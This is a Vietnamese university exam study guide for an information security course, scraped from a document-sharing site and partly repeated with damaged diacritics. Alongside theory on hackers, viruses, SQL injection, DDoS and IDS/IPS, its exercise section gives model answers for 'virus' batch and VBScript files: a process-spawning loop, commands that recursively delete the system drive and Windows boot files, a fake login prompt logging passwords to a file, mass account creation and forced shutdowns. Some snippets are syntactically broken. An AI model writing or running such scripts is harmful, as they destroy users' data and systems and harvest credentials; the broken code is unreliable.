ĐỀ CƯƠNG ÔN TẬP MÔN: AN TOÀN VÀ BẢO MẬT THÔNG TIN

16 782 3
ĐỀ CƯƠNG ÔN TẬP  MÔN: AN TOÀN VÀ BẢO MẬT THÔNG TIN

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

PHẦN 1: Cấu trúc đề thi Hình thức đề thi: Thi viết (tự luận) Thời gian: 60 phút Không được sử dụng tài liệu khi làm bài Cấu trúc của đề thi: 03 câu hỏi (không có phần trắc nghiệm) Phân bổ đề thi: + Câu 01: Lý thuyết (3 điểm): Nội dung phần này tập trung hỏi về một số khái niệm, kiến trúc,… + Câu 02: Bài tập (3 điểm): Viết chương trình Virus bằng Notepad lưu dưới dạng .bat hoặc .vbs + Câu 03 (04 điểm): Nêu một số phương pháp tấn công mạng máy tính PHẦN 2: Nội dung ôn tập A. Dạng câu hỏi lý thuyết (câu 01) Câu 1: Theo AnhChị hiểu thế nào là Hacker và Cracker ? Gợi ý trả lời: Hacker: Hacker là người có thể viết hay chỉnh sửa phần mềm, phần cứng máy tính bao gồm lập trình, quản trị và bảo mật. Những người này hiểu rõ hoạt động của hệ thống máy tính, mạng máy tính và dùng kiến thức của bản thân để làm thay đổi, chỉnh sửa nó với nhiều mục đích tốt xấu khác nhau. Cracker:Cracker là người có khả năng sửa đổi phần mềm để gỡ bỏ các biện pháp bảo vệ bản quyền như: chống sao chép, phiên bản dùng thử giới hạn, kiểm tra số serial, kiểm tra CD hay các phiền toái trong phần mềm như cửa sổ thông báo (screennag) và phần mềm quảng cáo (adware). Họ làm ra các phiên bản cracks, patcher, keygen ... Và đôi lúc, cracker còn thêm những phần mở rộng cho phần mềm thông qua các phiên bản cracks của họ. Câu 2: Anh Chị hãy phân loại và làm rõ Hacker theo hướng hành động thâm nhập ? Gợi ý trả lời: Theo hành động thâm nhập thì có 3 loại Hacker chính: Hacker mũ đen: là loại hacker mà cả thế giới chống lại họ, công việc hằng ngày của họ là truy cập trái phép vào các hệ thống, website, hay thông tin cá nhân một cách trái phép, khi hacker đột nhập thành công. Có thể là ăn cắp thông tin bí mật, trộm tài khoản thẻ ngân hàng, thêm bớt thông tin vào một dữ liệu nào đó… Ngoài những việc trên hacker mũ đen cũng có thể crack game và phần mềm để hỗ trợ miễn phí cho người sử dụng. Hacker mũ đen có lẽ là loại hacker có số lượng nhiều nhất và nguy hiểm nhất trong cộng đồng internet trên toàn thế giới. Hacker mũ trắng: là hacker trái ngược hoàn toàn với hacker mũ đen, họ là những hacker có luơng tâm, họ là những hacker sử dụng các kỹ năng và các cách xâm nhập

ĐỀ CƯƠNG ƠN TẬP MƠN: AN TỒN VÀ BẢO MẬT THƠNG TIN PHẦN 1: Cấu trúc đề thi - Hình thức đề thi: Thi viết (tự luận) - Thời gian: 60 phút - Không sử dụng tài liệu làm - Cấu trúc đề thi: 03 câu hỏi (khơng có phần trắc nghiệm) - Phân bổ đề thi: + Câu 01: Lý thuyết (3 điểm): Nội dung phần tập trung hỏi số khái niệm, kiến trúc,… + Câu 02: Bài tập (3 điểm): Viết chương trình Virus Notepad lưu dạng bat vbs + Câu 03 (04 điểm): Nêu số phương pháp cơng mạng máy tính PHẦN 2: Nội dung ôn tập A./ Dạng câu hỏi lý thuyết (câu 01) Câu 1: Theo Anh/Chị hiểu Hacker Cracker ? Gợi ý trả lời: -Hacker: Hacker người viết hay chỉnh sửa phần mềm, phần cứng máy tính bao gồm lập trình, quản trị bảo mật Những người hiểu rõ hoạt động hệ thống máy tính, mạng máy tính dùng kiến thức thân để làm thay đổi, chỉnh sửa với nhiều mục đích tốt xấu khác -Cracker:Cracker người có khả sửa đổi phần mềm để gỡ bỏ biện pháp bảo vệ quyền như: chống chép, phiên dùng thử giới hạn, kiểm tra số serial, kiểm tra CD hay phiền toái phần mềm cửa sổ thông báo (screennag) phần mềm quảng cáo (adware) Họ làm phiên cracks, patcher, keygen Và đơi lúc, cracker cịn thêm phần mở rộng cho phần mềm thông qua phiên cracks họ Câu 2: Anh/ Chị phân loại làm rõ Hacker theo hướng hành động thâm nhập ? Gợi ý trả lời: Theo hành động thâm nhập có loại Hacker chính: -Hacker mũ đen: loại hacker mà giới chống lại họ, công việc ngày họ truy cập trái phép vào hệ thống, website, hay thông tin cá nhân cách trái phép, hacker đột nhập thành cơng Có thể ăn cắp thơng tin bí mật, trộm tài khoản thẻ ngân hàng, thêm bớt thông tin vào liệu đó… Ngồi việc hacker mũ đen crack game phần mềm để hỗ trợ miễn phí cho người sử dụng Hacker mũ đen có lẽ loại hacker có số lượng nhiều nguy hiểm cộng đồng internet toàn giới -Hacker mũ trắng: hacker trái ngược hoàn toàn với hacker mũ đen, họ hacker có luơng tâm, họ hacker sử dụng kỹ cách xâm nhập phục vụ cho hoạt động luơng thiện có lợi cho tổ chức xã hội -Hacker mũ xám: hacker trung lập đen trắng, thực tế số lượng loại hacker gặp Một hacker mũ xám không đánh cắp thông tin cá nhân hay gây phiền phức lớn cho người quản trị, họ trở thành tội phạm mạng từ việc làm trái đạo đức Câu 3: Anh/ Chị so sánh giống khác Hacker Cracker( bẻ khóa phần mềm) Gợi ý trả lời: -Về giống nhau: Cả Hacker Cracker người công mục đích thâm nhập vào hệ thống để khai thác thơng tin -Về khác nhau: Hacker tập trung vào khai thác tìm lỗ hổng ứng dụng mạng Internet, máy tính phần mềm, cịn Cracker tập trung vào công việc khả sửa đổi phần mềm bỏ biện pháp bảo vệ/đăng ký phần mềm Câu 4: Anh/ Chị cho biết khái niệm Threat, Threat agent, Attack, Vulnerability Risk an tồn thơng tin ? Gợi ý trả lời: -Threat (sự đe dọa): Là mối đe dọa cơng hệ thống -Threat agent (tác nhân đe dọa): Là người phương tiện có khả ngây hại hệ thống -Attack (tấn công): hành động tác nhân đe dọa khai thác lỗ hổng khả bảo mật hệ thống để truy cập trái phép, lấy thông tin sở liệu, phá hoại, vô hiệu quá, sửa hệ thống, làm hệ thống tê liệt, hư hại mát liệu -Vulnerability (lỗ hổng): Là điểm yếu bảo mật hệ thống bị kẻ cơng khai thác để phá hoại hệ thống -Risk (nguy cơ, rủi ro): Là khả mối đe dọa công gây thiệt hại hệ thống Câu 5:Anh/ Chị hiểu Virus máy tính ? Phân tích số tác hại Virus máy tính ? Gợi ý trả lời: Virus máy tính ( gọi tắt Virus ) đoạn chương trình có khả tư nhân bản, lây nhiễm từ máy tính qua máy tính khác nhiều đường, qua môi trường mạng máy tính, Internet thư điện tử Một số tác hại Virus máy tính - Tiêu tốn tài nguyên hệ thống - Phá hủy liệu - Phá hủy hệ thống - Đánh cắp liệu - Mã hóa liệu để tống tiền - Gây khó chịu khác Câu 6: Anh/ Chị nêu số cách lây nhiễm Virus máy tính ? Và cách phịng chống Virus máy tính ? Gợi ý trả lời: Một số cách lây nhiễm Virus máy tính: - Qua việc chép tệp bị nhiễm Virus - Qua phần mềm bẻ khóa, phần mềm chép lậu - Qua thiết bị nhớ di động - Qua mạng nội bộ, Internet, đặc biệt thư điện tử - Qua " lỗ hổng " phần mềm Cách phịng tránh Virus máy tính: - Hạn chế việc chép khơng cần thiết khơng chạy chương trình tải từ Internet chép từ máy khác chưa đủ tin cậy - Không mở tệp gửi kèm thư điện tử có nghi ngờ nguồn gốc hay nội dung thư - Không truy cập vào trang web có nội dung khơng lành mạnh - Thường xuyên cập nhật sửa lỗi cho phần mềm chạy máy tính mình, kể hệ điều hành - Định kì lưu liệu để khơi phục bị virus phá hoại - Định kì quét diệt virus phần mềm diệt virus B./ Dạng câu hỏi tập (câu 02): Có gợi ý trả lời tham khảo Câu 1: Anh/ Chị viết chương trình Virus Notepad với đuôi bat cho phép tự động tạo liên tiếp chương trình Notepad máy tính bị treo @echo off :virus start %SystemRoot%\system32\notepad.exe goto virus Câu 2: Anh/ Chị viết chương trình Virus Notepad với bat cho phép tự động xóa hệ thống windows máy tính @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 30 –c “Máy tính bị tắt khoảng 30 giây nữa…” Hoặc @echo off msg *virus kích hoạt * attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini Câu 3: Anh/ Chị viết chương trình Virus Notepad với đuôi bat cho phép tự động mở chương trình Word, Paint, Notepad, Control Panel, Calculator, Explorer ghi lại tên đăng nhập, mật gõ vào tệp tin txt mặc định ổ đĩa C @echo off :virus start winword start mspaint start notepad start explorer start control start calc cd “C:Logs” set /p user=Username: set /p pass=Password: echo Username=%user%” Password=”%pass%” >> Logs.txt exit goto virus Câu 4: Anh/ Chị viết chương trình Virus Notepad với vbs cho phép thực phím máy tính (CAPSLOCK, NUMLOCK, SCROLLLOCK) liên tục nhấp nháy giây lần Set wshShell =wscript.CreateObject("WScript.Shell") wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" wshshell.sendkeys "~(enter)" wshshell.sendkeys "{bs}" // phím khoảng cách Space loop Câu 5: Anh/ Chị viết chương trình Virus Notepad với bat cho phép thực tạo thư mục liên tiếp, đóng thư mục thư mục tiếp tục xuất liên tiếp thông báo khởi động máy tính sau thời gian 60 giây @echo off :virus md folder1 md folder2 md folder3 md folder4 md folder5 start folder1 start folder2 start folder3 start folder4 start folder5 shutdown –r –t 60 –c “Máy tính bị khởi động lại thời gian 60 giây !!!” goto virus Câu 6: Anh/ Chị viết chương trình Virus Notepad với đuôi bat cho phép thực tạo thư mục ngẫu nhiên ổ đĩa C, D, E, F sau thời gian 30s máy tính tự động tắt @echo off :virus cd /d C: md %RANDOM% cd /d D: md %RANDOM% cd /d E: md %RANDOM% shutdown –s -f -t 30 -c "Máy tính tắt khoảng 30 giây nữa… " goto virus Câu 7: Anh/ Chị viết chương trình Virus Notepad với đuôi bat cho phép thực tạo ngẫu nhiên nhiều tài khoản người dùng @echo off :virus net user %random% /add //Tạo tài khoản người dùng goto virus Câu 8: Anh/ Chị viết chương trình Virus Notepad với vbs cho phép thực đóng tất chương trình mở, kể windows set ws=CreateObject("wscript.shell") ws.sendkeys "%{F4}" wscript.sleep 5000 loop C./ Dạng câu hỏi tập (câu 03): Có gợi ý trả lời tham khảo Câu 1: Anh/ Chị nêu phương pháp cơng kiểu Manin-the-Middle cách phịng chống Câu 2: Anh/ Chị nêu phương pháp công kiểu ManGoogle Hacking cách phòng chống Câu 3: Anh/ Chị nêu phương pháp cơng kiểu Footprinting cách phịng chống Câu 4: Anh/ Chị nêu phương pháp công SQL Injection cách phòng chống Gợi ý trả lời: Phương pháp công dạng SQL Injection: Phương pháp công dạng SQL injection kĩ thuật công lợi dụng lỗ hổng việc kiểm tra liệu nhập ứng dụng web thông báo lỗi hệ quản trị sở liệu để "tiêm vào" (injection) thi hành câu lệnh SQL bất hợp pháp Có bốn dạng thơng thường bao gồm: - Vượt qua kiểm tra lúc đăng nhập (authorization bypass) - Sử dụng câu lện SELECT - Sử dụng câu lệnh INSERT - Sử dụng Stored-procedures Cách phòng chống kiểu cơng SQL Injection: - Cần có chế kiểm sốt chặt chẽ giới hạn quyền xử lí liệu đến tài khoản người dùng mà ứng dụng web sử dụng - Các ứng dụng thông thường nên tránh dùng đến quyền dbo hay sa Quyền bị hạn chế, thiệt hại - Loại bỏ thơng tin kĩ thuật chứa thông điệp chuyển xuống cho người dùng ứng dụng có lỗi Các thơng báo lỗi thơng thường tiết lộ chi tiết kĩ thuật cho phép kẻ công biết điểm yếu hệ thống Câu 5: Theo Anh/ Chị, để thực thành công DDoS cần phải thỏa điều kiện gì? Đánh giá mức độ nguy hại, đề xuất biện pháp ngăn chặn, phịng chống hình thức cơng DDoS Cho ví dụ trường hợp công DDoS Việt Nam mà anh chị biết Gợi ý trả lời: Điều kiện để thực thành công DDoS ?  SYN Flood Attack  Ping Flood Attack (Ping of Death)  Teardrop Attack  Peer-to-Peer Attacks Mức độ nguy hại công từ chối dịch vụ lan tràn DDoS - Tê liệt dịch vụ giao dịch với hệ thống - Thiệt hại thời gian, tài đơn vị Một số biện pháp ngăn chặn, phòng chống hình thức cơng DDoS cho ví dụ cơng DDoS Việt Nam mà Anh/ Chị biết ? Khi phát máy chủ bị cơng nhanh chóng truy tìm địa IP cấm khơng cho gửi liệu đến máy chủ Dùng tính lọc liệu router/firewall để loại bỏ packet không mong muốn, giảm lượng lưu thông mạng tải máy chủ Sử dụng tính cho phép đặt rate limit router/firewall để hạn chế số lượng packet vào hệ thống Nếu bị công lỗi phần mềm hay thiết bị nhanh chóng cập nhật sửa lỗi cho hệ thống thay Dùng số chế, công cụ, phần mềm để chống lại TCP SYN Flooding Tắt dịch vụ khác có máy chủ để giảm tải đáp ứng tốt Nếu nâng cấp thiết bị phần cứng để nâng cao khả đáp ứng hệ thống hay sử dụng thêm máy chủ tính khác để phân chia tải Tạm thời chuyển máy chủ sang địa khác Câu 6: Anh/ Chị trình bày khái niệm chức hệ thống phát xâm nhập trái phép IDS (Intrusion Detection System) Gợi ý trả lời: Khái niệm IDS: IDS (Intrusion Detection System- hệ thống phát xâm nhập) hệ thống phần cứng phần mềm có chức giám sát, phân tích lưu lượng mạng, hoạt động khả nghi cảnh báo cho hệ thống, nhà quản trị IDS phân biệt cơng vào hệ thống từ bên (từ người dùng nội bộ) hay cơng từ bên ngồi (từ hacker) IDS phát dựa dấu hiệu đặc biệt nguy biết (giống cách phần mềm diệt virus dựa vào dấu hiệu đặc biệt để phát diệt virus), hay dựa so sánh lưu lượng mạng với baseline (thơng số đo đạc chuẩn hệ thống) để tìm dấu hiệu bất thường Chức IDS: Chức quan trọng là: Giám sát – Cảnh báo – Bảo vệ: - Giám sát: thực giám sát lưu lượng mạng hoạt động khả nghi - Cảnh báo: báo cáo tình trạng mạng cho hệ thống nhà quản trị - Bảo vệ: sử dụng thiết lập mặc định cấu hình từ nhà quản trị để có hành động tương ứng phù hợp chống lại kẻ xâm nhập phá hoại Chức mở rộng: IDS cần có khả phân biệt công từ bên công từ bên ngồi Ngồi ra, IDS có khả phát dấu hiệu bất thường dựa biết nhờ vào so sánh lưu lượng mạng với baseline Câu 7: Anh/ Chị trình bày khái niệm phân loại hệ thống ngăn chặn xâm nhập trái phép IPS (Intrusion Prevention System) Gợi ý trả lời: Khái niệm IPS: Hệ thống IPS (Intrusion Prevention System) kỹ thuật an ninh mới, kết hợp ưu điểm kỹ thuật firewall với hệ thống phát xâm nhập IDS, có khả phát xâm nhập, công tự động ngăn chặn cơng IPS khơng đơn giản dị cơng, chúng có khả ngăn chặn cản trở cơng Chúng cho phép tổ chức ưu tiên, thực bước để ngăn chặn lại xâm nhập Phần lớn hệ thống IPS đặt vành đai mạng, dủ khả bảo vệ tất thiết bị mạng Phân loại hệ thống IPS: -IPS luồng(Promiscuous Mode IPS) Hệ thống IPS luồng không can thiệp trực tiếp vào luồng liệu Luồng liệu vào hệ thống mạng qua tường lửa IPS IPS kiểm sốt luồng liệu vào, phân tích phát dấu hiệu xâm nhập, cơng Với vị trí này, IPS quản lý tường lửa, dẫn chặn lại hành động nghi ngờ mà không làm ảnh hưởng đến tốc độ lưu thông mạng -IPS luồng (In-line IPS) Vị trí IPS nằm trước tường lửa, luồng liệu phải qua IPS trước tới tường lửa Điểm khác so với IPS ngồi luồng có thêm chức nǎng chặn lưu thơng (traffic-blocking) Điều làm cho IPS ngǎn chặn luồng giao thông nguy hiểm nhanh so với IPS luồng (Promiscuous Mode IPS) Tuy nhiên, vị trí làm cho tốc độ luồng thơng tin vào mạng chậm Với mục tiêu ngăn chặn công, hệ thống IPS phải hoạt động theo thời gian thực Tốc độ họat động hệ thống yếu tố quan trọng Qua trình phát xâm nhập phải đủ nhanh để ngăn chặn công Nếu khơng đáp ứng điều công thực xong hệ thống IPS vơ nghĩa Câu 8: Anh/ Chị trình bày khái niệm, kiến trúc chế hoạt động tường lửa Firewall, IPSec, VPN,… Chúc bạn thi tốt ! ... đích thâm nhập vào hệ thống để khai thác thông tin -Về khác nhau: Hacker tập trung vào khai thác tìm lỗ hổng ứng dụng mạng Internet, máy tính phần mềm, cịn Cracker tập trung vào công việc khả sửa... giới chống lại họ, công việc ngày họ truy cập trái phép vào hệ thống, website, hay thông tin cá nhân cách trái phép, hacker đột nhập thành công Có thể ăn cắp thơng tin bí mật, trộm tài khoản... ngǎn chặn luồng giao thông nguy hiểm nhanh so với IPS ngồi luồng (Promiscuous Mode IPS) Tuy nhiên, vị trí làm cho tốc độ luồng thông tin vào mạng chậm Với mục tiêu ngăn chặn công, hệ thống IPS phải

Ngày đăng: 04/07/2017, 15:24

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan